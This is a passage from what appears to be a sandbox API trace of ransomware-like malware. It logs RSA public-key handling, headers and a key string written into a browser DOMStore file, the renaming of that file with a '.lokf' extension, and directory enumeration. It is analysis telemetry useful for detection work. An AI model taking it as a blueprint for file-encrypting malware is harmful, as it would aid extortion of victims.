KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.412] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.412] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8588) returned 1 [0061.413] CryptCreateHash (in: hProv=0x6b8588, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0061.413] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0061.413] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0061.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0061.413] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0061.413] GetLastError () returned 0x0 [0061.413] CryptDestroyHash (hHash=0x327cb80) returned 1 [0061.413] CryptReleaseContext (hProv=0x6b8588, dwFlags=0x0) returned 1 [0061.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0061.413] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0061.413] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0061.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0061.413] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0061.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0061.413] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0061.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0061.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0061.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0061.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0061.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0061.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86f50 [0061.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c862f8 [0061.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86f98 [0061.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86310 [0061.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86340 [0061.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0061.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86358 [0061.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0061.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0061.414] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0061.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0061.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86340 | out: hHeap=0x660000) returned 1 [0061.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86358 | out: hHeap=0x660000) returned 1 [0061.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0061.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0061.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0061.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0061.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86358 [0061.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0061.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c86340 [0061.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0061.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3201228 [0061.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0061.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0061.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0061.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0061.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0061.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0061.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0061.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86358 | out: hHeap=0x660000) returned 1 [0061.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0061.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86340 | out: hHeap=0x660000) returned 1 [0061.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0061.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0061.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0061.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0061.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0061.414] GetCurrentThreadId () returned 0x9e0 [0061.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8cac0 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.415] GetCurrentThreadId () returned 0x9e0 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0061.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0061.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86340 [0061.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0061.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0061.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0061.416] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0061.416] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0061.416] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0061.416] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0061.416] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86358 [0061.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0061.416] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0061.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0061.416] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86328 [0061.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0061.416] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0061.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0061.416] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0061.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0061.416] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0061.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0061.416] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0061.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0061.416] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86370 [0061.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0061.416] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0061.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0061.416] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0061.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0061.416] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0061.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0061.416] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0061.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86340 | out: hHeap=0x660000) returned 1 [0061.416] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86340 [0061.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0061.416] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0061.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0061.416] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0061.417] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x9c87710 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.417] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3292fe8 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0061.417] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245620 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86340 | out: hHeap=0x660000) returned 1 [0061.417] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32947b0 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0061.417] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fb18 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fb18 | out: hHeap=0x660000) returned 1 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245620 | out: hHeap=0x660000) returned 1 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c87710 | out: hHeap=0x660000) returned 1 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3292fe8 | out: hHeap=0x660000) returned 1 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86370 | out: hHeap=0x660000) returned 1 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86358 | out: hHeap=0x660000) returned 1 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86328 | out: hHeap=0x660000) returned 1 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0061.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0061.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86310 | out: hHeap=0x660000) returned 1 [0061.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86f98 | out: hHeap=0x660000) returned 1 [0061.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0061.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0061.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0061.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0061.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0061.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0061.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0061.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0061.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0061.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0061.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0061.418] WriteFile (in: hFile=0x5cc, lpBuffer=0x9f4fb24*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9f4fb24*, lpNumberOfBytesWritten=0x9f4fb14*=0x8, lpOverlapped=0x0) returned 1 [0061.418] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.418] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0061.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0061.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0061.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0061.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0061.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0061.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0061.418] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0061.419] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0061.419] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0061.419] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0061.419] CloseHandle (hObject=0x5cc) returned 1 [0061.419] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml.lokf")) returned 1 [0061.419] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0061.419] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.419] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.420] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x605dd8a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x696aec80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.google[1].xml", cAlternateFileName="WWWGOO~1.XML")) returned 0 [0061.420] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.420] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.420] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.420] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\") returned="UV0DUWVB\\" [0061.421] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0061.421] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0061.421] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0061.421] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.421] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.421] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.421] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.421] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.421] PathFindFileNameW (pszPath="") returned="" [0061.421] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.421] FindNextFileW (in: hFindFile=0x68d798, 